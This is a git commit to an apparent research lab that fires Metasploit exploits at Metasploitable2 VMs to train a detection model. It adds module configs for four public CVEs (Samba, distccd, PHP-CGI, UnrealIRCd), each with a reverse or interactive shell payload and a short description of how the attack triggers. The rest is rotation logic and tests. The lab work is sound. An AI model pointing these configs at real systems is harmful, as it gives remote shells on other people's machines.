fleet: rotate exploit modules per (host, slot, ep); Tier 3 by default

Closes the "every run hits the same vulnerability" gap. Before this commit, the fleet shipped Tier-2 episodes (no exploit at all) with only the post-infection sample varying. Tier-3 had a single canned module — vsftpd_234_backdoor — so even when exploit fire was exercised, the entry vector never changed. Trainer would see one shape of `armed → infecting` and learn nothing about how varied real exploits look on the wire / in /proc. What landed: exploits/modules/ + samba_usermap_script.toml CVE-2007-2447, SMB:139 + distccd_command_exec.toml CVE-2004-2687, distcc:3632 + php_cgi_arg_injection.toml CVE-2012-1823, http:80 + unreal_ircd_3281_backdoor.toml CVE-2010-2075, ircd:6667 (vsftpd_234_backdoor.toml unchanged) All five are canonical Metasploitable2 vectors with stable Metasploit modules. Each TOML carries the RPORT the launcher needs to wire its hostfwd at, plus a payload tuned to a clean shell session (cmd/unix/interact for in-band shells, cmd/unix/reverse* with deterministic LPORTs for reverse shells). exploits/modules.py + select_module(catalog, host_id, slot, episode_index) — same SHA-256-keyed deterministic selection shape SampleManifest uses for samples. Two hosts at the same slot/episode hash to different modules; one host walks the full catalog within ~len(catalog) episodes. + module_target_port() — pulls RPORT off the module config so the fleet can plumb the launcher's hostfwd at the right service. orchestrator/fleet.py - _run_slot now decides Tier 3 vs Tier 2 from msfrpcd reachability + module-catalog populated. Default is Tier 3 when both are true; Tier 2 fallback when not (logged + recorded in SlotResult.tier so trainers can filter no-exploit episodes). - Per-slot module via select_module() — each concurrent slot in a wave gets a different vector AND a different sample. - PORT_BASE per slot (target_port + slot * 1000) so concurrent Tier-3 targets don't collide on the host-side hostfwd port. - _msfrpcd_available() probe gates the dispatch. - Fleet-side log line records (slot, ep, tier, sample, module, run_dir) so the operator can see at a glance what each wave is exercising. - SlotResult grows tier + module_name fields; FleetConfig grows modules + force_tier2 + msfrpcd_{host,port} fields. orchestrator/episode.py + EpisodeConfig.exploit_meta — plain dict the runner stamps into meta.exploit so every Tier-3 episode records {framework, module path, module type, payload, RPORT, RHOSTS template}. Trainers join on meta.exploit.module_name to stratify by entry vector; meta.sample.name to stratify by post-infection family. tools/run_tier3_demo.py + Builds exploit_meta from the loaded ModuleConfig and passes it to EpisodeConfig. Sample is now also passed (was missing). tools/run_fleet.py + --modules-dir (default exploits/modules/) — load module catalog on startup; pass to FleetConfig. + --force-tier2 — escape hatch for dev / smoke tests. + JSON output now includes per-slot {tier, module} so the operator can see at a glance what each slot ran without grepping logs. Tests: 129 (was 119). New cases: test_exploits.py +6 - catalog has at least the five canonical Metasploitable2 vectors - select_module is deterministic per (host, slot, ep) - select_module diversifies across hosts - select_module walks the full catalog over many episodes - module_target_port pulls RPORT for each shipped TOML test_fleet.py +4 - _run_slot dispatches to run_tier3_demo.py when msfrpcd up - falls back to run_real_vm_demo.py when msfrpcd unreachable - falls back when module catalog empty - --force-tier2 overrides msfrpcd availability - PORT_BASE is unique per concurrent slot (no hostfwd collision) Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
2026-04-30 02:22:49 -05:00 · 2026-04-30 02:22:49 -05:00 · a193d17ead
commit a193d17ead
parent d86502d950
11 changed files with 451 additions and 22 deletions
--- a/exploits/modules.py
+++ b/exploits/modules.py
@ -10,10 +10,17 @@ imperative and assume an interactive console; the driver needs the
 *structured* options to push them through msfrpc. TOML is the simplest
 way to express a small typed map of options — and it round-trips
 cleanly into ``meta.json`` for episode reproducibility.
+
+Per-(host, slot, episode) selection mirrors the sample-manifest
+selector: we want different vulnerabilities exercised across hosts
+and waves so the trained model sees a diverse corpus of
+``armed → infecting`` transition shapes, not just the same FTP
+backdoor every run.
 """

 from __future__ import annotations

+import hashlib
 import tomllib
 from dataclasses import dataclass, field
 from pathlib import Path
@ -95,3 +102,40 @@ def load_module_configs(directory: Path) -> dict[str, ModuleConfig]:
        p.stem: load_module_config(p)
        for p in sorted(directory.glob("*.toml"))
    }
+
+
+def select_module(
+    catalog: dict[str, ModuleConfig],
+    *,
+    host_id: str,
+    slot: int,
+    episode_index: int,
+) -> ModuleConfig:
+    """Deterministic per-(host, slot, ep) module selector. Mirrors
+    SampleManifest.select() so the entry vector rotates the same way
+    the post-infection workload does. Two hosts hash to different
+    modules at the same slot/episode (collision rate ~1/N); a single
+    host walks the full catalog within ~len(catalog) episodes.
+
+    Inputs reduce to a SHA-256 keyed lookup so runs replay
+    bit-identically given the same (host, slot, ep) tuple."""
+    if not catalog:
+        raise ValueError("module catalog is empty")
+    keys = sorted(catalog.keys())
+    seed = f"module|{host_id}|{slot}|{episode_index}".encode()
+    h = hashlib.sha256(seed).digest()
+    idx = int.from_bytes(h[:8], "big") % len(keys)
+    return catalog[keys[idx]]
+
+
+def module_target_port(module: ModuleConfig) -> int | None:
+    """Pull the RPORT off a module config. Used by the fleet runner
+    to wire the launcher's hostfwd to the right service inside the
+    target VM (vsftpd:21, samba:139, php-cgi:80, distccd:3632,
+    unrealircd:6667)."""
+    rport = module.options.get("RPORT")
+    if isinstance(rport, int):
+        return rport
+    if isinstance(rport, str) and rport.isdigit():
+        return int(rport)
+    return None
--- a/exploits/modules/distccd_command_exec.toml
+++ b/exploits/modules/distccd_command_exec.toml
@ -0,0 +1,25 @@
+description = """
+distccd v1 unauthenticated command execution (CVE-2004-2687). The
+distcc daemon doesn't verify the source of compile jobs, so a
+crafted DCC_CMD-style request runs an arbitrary command as the
+distccd user. Metasploitable2 ships distccd 2.18.3 listening on
+3632. Returns a low-priv shell — paired with a privesc later if
+needed; for envelope work the unprivileged shell is enough.
+"""
+
+[module]
+type = "exploit"
+path = "unix/misc/distcc_exec"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 3632
+
+[payload]
+path = "cmd/unix/reverse"
+[payload.options]
+LHOST = "{{ target_ip }}"
+LPORT = 4444
+
+[session]
+type = "shell"
--- a/exploits/modules/php_cgi_arg_injection.toml
+++ b/exploits/modules/php_cgi_arg_injection.toml
@ -0,0 +1,25 @@
+description = """
+PHP-CGI argument injection (CVE-2012-1823). PHP < 5.3.12 in CGI mode
+treats query-string args as command-line flags, letting a crafted
+?-d allow_url_include=1 turn any PHP page into a remote-code-exec.
+Metasploitable2's Apache + php-cgi setup is vulnerable. Returns a
+shell session on whoever runs Apache.
+"""
+
+[module]
+type = "exploit"
+path = "multi/http/php_cgi_arg_injection"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 80
+TARGETURI = "/"
+
+[payload]
+path = "cmd/unix/reverse_perl"
+[payload.options]
+LHOST = "{{ target_ip }}"
+LPORT = 4445
+
+[session]
+type = "shell"
--- a/exploits/modules/samba_usermap_script.toml
+++ b/exploits/modules/samba_usermap_script.toml
@ -0,0 +1,21 @@
+description = """
+Samba 3.0.20 username-map command injection (CVE-2007-2447). Trigger
+is a crafted username at SMB authentication; the Samba daemon shells
+out via the username_map_script and runs whatever the attacker put in
+the username. Standard Metasploitable2 vector. Returns a root shell
+on the SMB socket — works with cmd/unix/interact.
+"""
+
+[module]
+type = "exploit"
+path = "multi/samba/usermap_script"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 139
+
+[payload]
+path = "cmd/unix/interact"
+
+[session]
+type = "shell"
--- a/exploits/modules/unreal_ircd_3281_backdoor.toml
+++ b/exploits/modules/unreal_ircd_3281_backdoor.toml
@ -0,0 +1,25 @@
+description = """
+UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075). A modified release
+shipped to the official mirrors carried a backdoor that runs an
+arbitrary command on receipt of a magic AB; payload string. Once
+the backdoor was discovered the official tarball was pulled, but
+Metasploitable2 still ships the trojaned build. Returns a shell on
+the IRC user.
+"""
+
+[module]
+type = "exploit"
+path = "unix/irc/unreal_ircd_3281_backdoor"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 6667
+
+[payload]
+path = "cmd/unix/reverse"
+[payload.options]
+LHOST = "{{ target_ip }}"
+LPORT = 4446
+
+[session]
+type = "shell"
--- a/orchestrator/episode.py
+++ b/orchestrator/episode.py
@ -82,6 +82,10 @@ class EpisodeConfig:
    # into meta.json so trainers can join episodes by family / kind
    # without re-deriving from events. None = v1 yes-loop fallback.
    sample: Sample | None = None
+    # The exploit module that fired (Tier 3+). Plain dict so the runner
+    # doesn't need to import exploits.modules; populated by callers
+    # that have a ModuleConfig in hand.
+    exploit_meta: dict | None = None
    # Snapshot/revert (Tier 0+):
    #   revert_at_start — before any phase walks, loadvm <snapshot_name>.
    #     Use this to drop the guest back to a known-good baseline at
@ -374,7 +378,7 @@ class EpisodeRunner:
                "ram_mib": None,
                "target_pid": self.cfg.target_pid,
            },
-            "exploit": None,
+            "exploit": self.cfg.exploit_meta,
            "sample": sample_meta,
            "schedule": {
                "baseline_seconds": self.cfg.duration_s,
--- a/orchestrator/fleet.py
+++ b/orchestrator/fleet.py
@ -38,12 +38,27 @@ from concurrent.futures import ThreadPoolExecutor, as_completed
 from dataclasses import dataclass, field
 from pathlib import Path

+from exploits.modules import (
+    ModuleConfig, load_module_configs, module_target_port, select_module,
+)
 from samples.manifest import Sample, SampleManifest


 log = logging.getLogger("cis490.fleet")


+def _msfrpcd_available(host: str = "127.0.0.1", port: int = 55553) -> bool:
+    """True when msfrpcd is listening — gate for the Tier-3 default.
+    A Tier-2 fallback runs when msfrpcd isn't there (still useful
+    data, just labeled with no-exploit so the trainer can filter)."""
+    import socket as _sk
+    try:
+        with _sk.create_connection((host, port), timeout=0.3):
+            return True
+    except OSError:
+        return False
+
+
@dataclass(frozen=True)
 class FleetCapacity:
    cores_total: int
@ -82,12 +97,21 @@ class FleetConfig:
    repo_root: Path
    data_root: Path
    manifest: SampleManifest
+    # Module catalog for Tier-3 dispatch. Required for fleet-driven
+    # exploit-fire variety; empty catalog forces Tier-2 fallback.
+    modules: dict[str, ModuleConfig] = field(default_factory=dict)
    # VM resource shape — must match what the launcher requests.
    ram_per_vm_mib: int = 320
    # Cap concurrency below the calculated max (e.g. for a smoke test).
    max_concurrent_override: int | None = None
    # Skip episodes whose sample requires a real binary that's not present.
    require_real_samples: bool = False
+    # Force Tier-2 even when msfrpcd is up; used by tests + dev runs
+    # that want a no-exploit baseline.
+    force_tier2: bool = False
+    # msfrpcd connectivity (read by tier-3 driver via env).
+    msfrpcd_host: str = "127.0.0.1"
+    msfrpcd_port: int = 55553


 def _read_meminfo() -> dict[str, int]:
@ -185,6 +209,8 @@ class SlotResult:
    episode_id: str | None
    rc: int
    duration_s: float
+    tier: str = "tier2"            # "tier3" when an exploit fired
+    module_name: str | None = None  # exploit module identifier (Tier 3 only)
    error: str | None = None
    extra: dict = field(default_factory=dict)

@ -196,20 +222,29 @@ def _run_slot(
    episode_index: int,
    capacity: FleetCapacity,
 ) -> SlotResult:
-    """Run one Tier-2-shaped episode in a dedicated slot.
+    """Run one episode in a dedicated slot.

-    For now the per-slot driver shells out to ``tools/run_real_vm_demo.py``
-    with SLOT and PROFILE env so the launcher gives us a unique RUN_DIR
-    and the load mimic varies by sample. When the Tier-3/4 paths land,
-    add a sample-kind dispatch here."""
+    Dispatch:
+      - Tier 3 (default when msfrpcd is listening AND a module catalog
+        is populated): real exploit fire via run_tier3_demo.py with a
+        deterministically-selected module + sample.
+      - Tier 2 (fallback): no exploit; the controller drives a labeled
+        workload directly via the serial console. Recorded in
+        SlotResult.tier so trainers can filter the no-exploit episodes.
+    """
    # Per-slot run dir keeps QEMU sockets + pidfiles isolated. Without
-    # this, parallel slots rmtree each other's run dir mid-boot —
-    # historic bug that left only one VM per wave actually shipping.
-    run_dir = f"/tmp/cis490-vm-fleet-{slot}"
+    # this, parallel slots rmtree each other's run dir mid-boot.
+    run_dir_base = "/tmp/cis490-vm-fleet"
+
+    # Decide tier.
+    tier3_ready = (
+        not cfg.force_tier2
+        and bool(cfg.modules)
+        and _msfrpcd_available(cfg.msfrpcd_host, cfg.msfrpcd_port)
+    )

    env = os.environ.copy()
    env["SLOT"] = str(slot)
-    env["RUN_DIR"] = run_dir
    env["SAMPLE_NAME"] = sample.name
    env["SAMPLE_PROFILE"] = sample.profile
    env["SAMPLE_KIND"] = sample.kind
@ -217,26 +252,64 @@ def _run_slot(
    env["FLEET_EPISODE_INDEX"] = str(episode_index)
    env["FLEET_MAX_CONCURRENT"] = str(capacity.max_concurrent)

+    venv_py = cfg.repo_root / ".venv" / "bin" / "python"
+    py = str(venv_py) if venv_py.exists() else "python3"
+
    log_dir = cfg.data_root / "fleet-logs"
    log_dir.mkdir(parents=True, exist_ok=True)
    out_log = log_dir / f"slot-{slot}-ep-{episode_index}.log"

-    # Prefer the venv python so the subprocess gets the same deps as
-    # the parent (msgpack, httpx, pycdlib, …). Fall back to
-    # /usr/bin/env python3 if the venv layout differs.
-    venv_py = cfg.repo_root / ".venv" / "bin" / "python"
-    py = str(venv_py) if venv_py.exists() else "python3"
+    if tier3_ready:
+        module = select_module(
+            cfg.modules,
+            host_id=cfg.host_id, slot=slot, episode_index=episode_index,
+        )
+        target_port = module_target_port(module) or 21
+        # Per-slot runner dir for the target VM.
+        run_dir = f"{run_dir_base}-target-{slot}"
+        env["RUN_DIR"] = run_dir
+        # Each slot gets a unique host-side hostfwd port so concurrent
+        # targets don't collide on the loopback port.
+        env["PORT_BASE"] = str(target_port + slot * 1000)
+        cmd = [
+            py,
+            str(cfg.repo_root / "tools" / "run_tier3_demo.py"),
+            "--data-root", str(cfg.data_root),
+            "--run-dir", run_dir,
+            "--module", module.name,
+            "--sample", sample.name,
+            "--target-port", str(target_port + slot * 1000),
+        ]
+        tier = "tier3"
+        module_name: str | None = module.name
+    else:
+        run_dir = f"{run_dir_base}-{slot}"
+        env["RUN_DIR"] = run_dir
+        cmd = [
+            py,
+            str(cfg.repo_root / "tools" / "run_real_vm_demo.py"),
+            "--data-root", str(cfg.data_root),
+            "--run-dir", run_dir,
+            "--sample", sample.name,
+        ]
+        tier = "tier2"
+        module_name = None
+        if not cfg.force_tier2 and not cfg.modules:
+            log.warning("slot=%d falling back to Tier 2: empty module catalog", slot)
+        elif not cfg.force_tier2:
+            log.warning("slot=%d falling back to Tier 2: msfrpcd unreachable at %s:%d",
+                        slot, cfg.msfrpcd_host, cfg.msfrpcd_port)
+
+    log.info(
+        "slot=%d ep=%d tier=%s sample=%s module=%s run_dir=%s",
+        slot, episode_index, tier, sample.name, module_name, run_dir,
+    )

    started = time.monotonic()
    try:
        with out_log.open("ab") as logf:
            proc = subprocess.run(
-                [
-                    py,
-                    str(cfg.repo_root / "tools" / "run_real_vm_demo.py"),
-                    "--data-root", str(cfg.data_root),
-                    "--run-dir", run_dir,
-                ],
+                cmd,
                cwd=str(cfg.repo_root),
                env=env,
                stdout=logf,
@ -254,9 +327,11 @@ def _run_slot(
        slot=slot,
        sample_name=sample.name,
        sample_kind=sample.kind,
-        episode_id=None,  # parsed from the log later by the driver
+        episode_id=None,
        rc=rc,
        duration_s=duration,
+        tier=tier,
+        module_name=module_name,
        error=err,
    )

--- a/tests/test_exploits.py
+++ b/tests/test_exploits.py
@ -26,6 +26,27 @@ MODULES_DIR = REPO_ROOT / "exploits" / "modules"
 # Module config loader
 # -----------------------------------------------------------------------

+def test_module_catalog_has_at_least_five_metasploitable2_vectors() -> None:
+    """The fleet's entry-vector variety depends on the module catalog
+    being populated. Five Metasploitable2 vectors is the minimum
+    that gives the trainer a non-trivial diversity of armed →
+    infecting transition shapes."""
+    from exploits.modules import load_module_configs
+    catalog = load_module_configs(MODULES_DIR)
+    assert len(catalog) >= 5, \
+        f"only {len(catalog)} modules; need at least 5 for fleet variety"
+    names = set(catalog.keys())
+    expected = {
+        "vsftpd_234_backdoor",
+        "samba_usermap_script",
+        "distccd_command_exec",
+        "php_cgi_arg_injection",
+        "unreal_ircd_3281_backdoor",
+    }
+    missing = expected - names
+    assert not missing, f"missing canonical modules: {missing}"
+
+
 def test_load_vsftpd_module_config_round_trip() -> None:
    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
    assert cfg.name == "vsftpd_234_backdoor"
@ -44,6 +65,46 @@ def test_render_options_substitutes_target_ip() -> None:
    assert rendered["PAYLOAD"] == "cmd/unix/interact"


+def test_select_module_is_deterministic() -> None:
+    from exploits.modules import load_module_configs, select_module
+    catalog = load_module_configs(MODULES_DIR)
+    a = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
+    b = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
+    assert a is b
+
+
+def test_select_module_diversifies_across_hosts() -> None:
+    from exploits.modules import load_module_configs, select_module
+    catalog = load_module_configs(MODULES_DIR)
+    matches = 0
+    for slot in range(20):
+        a = select_module(catalog, host_id="alice", slot=slot, episode_index=0)
+        b = select_module(catalog, host_id="bob",   slot=slot, episode_index=0)
+        if a is b:
+            matches += 1
+    assert matches < 15, "host_id seed isn't producing module variety"
+
+
+def test_select_module_walks_catalog() -> None:
+    from exploits.modules import load_module_configs, select_module
+    catalog = load_module_configs(MODULES_DIR)
+    seen = set()
+    for ep in range(200):
+        seen.add(select_module(catalog, host_id="lab-x", slot=0, episode_index=ep).name)
+    assert seen == set(catalog.keys()), \
+        f"only saw {len(seen)}/{len(catalog)} modules across 200 episodes"
+
+
+def test_module_target_port_pulls_rport() -> None:
+    from exploits.modules import load_module_configs, module_target_port
+    catalog = load_module_configs(MODULES_DIR)
+    assert module_target_port(catalog["vsftpd_234_backdoor"]) == 21
+    assert module_target_port(catalog["samba_usermap_script"]) == 139
+    assert module_target_port(catalog["distccd_command_exec"]) == 3632
+    assert module_target_port(catalog["php_cgi_arg_injection"]) == 80
+    assert module_target_port(catalog["unreal_ircd_3281_backdoor"]) == 6667
+
+
 def test_render_options_handles_both_brace_styles(tmp_path: Path) -> None:
    p = tmp_path / "x.toml"
    p.write_text(
--- a/tests/test_fleet.py
+++ b/tests/test_fleet.py
@ -189,6 +189,133 @@ def test_manifest_rejects_duplicate_names(tmp_path: Path) -> None:
        SampleManifest.load(p)


+# ---------------------------------------------------------------------------
+# Fleet dispatch — Tier 3 vs Tier 2 selection + per-slot module rotation
+# ---------------------------------------------------------------------------
+
+
+class _RecordingPopen:
+    """Replacement for subprocess.run that just records what it would
+    have invoked. Returns a returncode-0 result."""
+    calls: list[dict] = []
+
+    def __init__(self, args, **kwargs) -> None:
+        # Mimic CompletedProcess shape.
+        type(self).calls.append({"args": args, "env": kwargs.get("env"), "cwd": kwargs.get("cwd")})
+        self.returncode = 0
+        self.stdout = b""
+        self.stderr = b""
+
+
+def _fleet_cfg_with_modules(tmp_path: Path, *, force_tier2: bool = False):
+    from exploits.modules import load_module_configs
+    from orchestrator import fleet
+    from samples.manifest import SampleManifest
+
+    repo_root = REPO_ROOT
+    return fleet.FleetConfig(
+        host_id="test-host",
+        repo_root=repo_root,
+        data_root=tmp_path,
+        manifest=SampleManifest.load(repo_root / "samples" / "manifest.toml"),
+        modules=load_module_configs(repo_root / "exploits" / "modules"),
+        force_tier2=force_tier2,
+    )
+
+
+def _patch_subprocess(monkeypatch):
+    from orchestrator import fleet
+    _RecordingPopen.calls = []
+    monkeypatch.setattr(fleet.subprocess, "run", _RecordingPopen)
+
+
+def test_fleet_dispatches_to_tier3_when_msfrpcd_listening(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+
+    assert res.tier == "tier3", res
+    assert res.module_name in cfg.modules
+    cmd = _RecordingPopen.calls[-1]["args"]
+    # The Tier-3 runner is what gets invoked.
+    assert any("run_tier3_demo.py" in str(a) for a in cmd)
+    # The module name is plumbed through.
+    assert "--module" in cmd
+    assert res.module_name in cmd
+
+
+def test_fleet_falls_back_to_tier2_when_msfrpcd_down(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: False)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+
+    assert res.tier == "tier2"
+    assert res.module_name is None
+    cmd = _RecordingPopen.calls[-1]["args"]
+    assert any("run_real_vm_demo.py" in str(a) for a in cmd)
+
+
+def test_fleet_falls_back_to_tier2_when_module_catalog_empty(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    from samples.manifest import SampleManifest
+    cfg = fleet.FleetConfig(
+        host_id="test-host",
+        repo_root=REPO_ROOT,
+        data_root=tmp_path,
+        manifest=SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml"),
+        modules={},  # explicitly empty
+    )
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    assert res.tier == "tier2"
+
+
+def test_fleet_force_tier2_overrides_msfrpcd(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path, force_tier2=True)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    assert res.tier == "tier2"
+
+
+def test_fleet_assigns_unique_port_base_per_slot(monkeypatch, tmp_path) -> None:
+    """Concurrent Tier-3 slots can't share the host-side hostfwd port
+    or all targets stomp on each other's vsftpd:21 → 21 mapping. The
+    fleet must shift PORT_BASE per slot."""
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    fleet._run_slot(cfg, slot=1, sample=sample, episode_index=0, capacity=capacity)
+    fleet._run_slot(cfg, slot=2, sample=sample, episode_index=0, capacity=capacity)
+
+    port_bases = [c["env"]["PORT_BASE"] for c in _RecordingPopen.calls]
+    assert len(set(port_bases)) == len(port_bases), \
+        f"PORT_BASE collision across slots: {port_bases}"
+
+
 def test_manifest_marks_real_when_sha256_present(tmp_path: Path) -> None:
    p = tmp_path / "real.toml"
    p.write_text(
--- a/tools/run_fleet.py
+++ b/tools/run_fleet.py
@ -23,6 +23,7 @@ from pathlib import Path
 # Allow running as a script.
 sys.path.insert(0, str(Path(__file__).resolve().parent.parent))

+from exploits.modules import load_module_configs  # noqa: E402
 from orchestrator.fleet import (  # noqa: E402
    FleetConfig, FleetRunner, capacity_report, detect_capacity,
 )
@ -36,10 +37,14 @@ def main(argv: list[str] | None = None) -> int:
    p.add_argument("--max-concurrent", type=int, default=None)
    p.add_argument("--manifest",
                   default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"))
+    p.add_argument("--modules-dir",
+                   default=str(Path(__file__).resolve().parent.parent / "exploits" / "modules"))
    p.add_argument("--data-root", default="data")
    p.add_argument("--host-id", default=os.environ.get("FLEET_HOST_ID") or os.uname().nodename)
    p.add_argument("--ram-per-vm-mib", type=int, default=320)
    p.add_argument("--require-real-samples", action="store_true")
+    p.add_argument("--force-tier2", action="store_true",
+                   help="Skip Tier 3 even when msfrpcd is reachable")
    p.add_argument("--log-level", default="INFO")
    args = p.parse_args(argv)

@ -54,15 +59,19 @@ def main(argv: list[str] | None = None) -> int:

    manifest = SampleManifest.load(args.manifest)
    repo_root = Path(__file__).resolve().parent.parent
+    modules_dir = Path(args.modules_dir)
+    modules = load_module_configs(modules_dir) if modules_dir.exists() else {}

    cfg = FleetConfig(
        host_id=args.host_id,
        repo_root=repo_root,
        data_root=Path(args.data_root).resolve(),
        manifest=manifest,
+        modules=modules,
        ram_per_vm_mib=args.ram_per_vm_mib,
        max_concurrent_override=args.max_concurrent,
        require_real_samples=args.require_real_samples,
+        force_tier2=args.force_tier2,
    )

    runner = FleetRunner(cfg)
@ -77,11 +86,14 @@ def main(argv: list[str] | None = None) -> int:
    print(json.dumps({
        "host_id": args.host_id,
        "capacity": result.capacity.to_dict(),
+        "modules_loaded": sorted(modules.keys()),
        "slots": [
            {
                "slot": s.slot,
                "sample": s.sample_name,
                "sample_kind": s.sample_kind,
+                "tier": s.tier,
+                "module": s.module_name,
                "rc": s.rc,
                "duration_s": s.duration_s,
                "error": s.error,
--- a/tools/run_tier3_demo.py
+++ b/tools/run_tier3_demo.py
@ -224,6 +224,16 @@ def main() -> int:
            phase_schedule=DEFAULT_SCHEDULE,
            image_name=module.name + "-target",
            snapshot_name="qcow2-snapshot-on",
+            sample=sample,
+            exploit_meta={
+                "framework": "metasploit",
+                "module": module.module_path,
+                "module_type": module.module_type,
+                "module_name": module.name,
+                "payload": module.payload_path,
+                "rport": module.options.get("RPORT"),
+                "rhost_template": module.options.get("RHOSTS"),
+            },
        )
        runner = EpisodeRunner(cfg)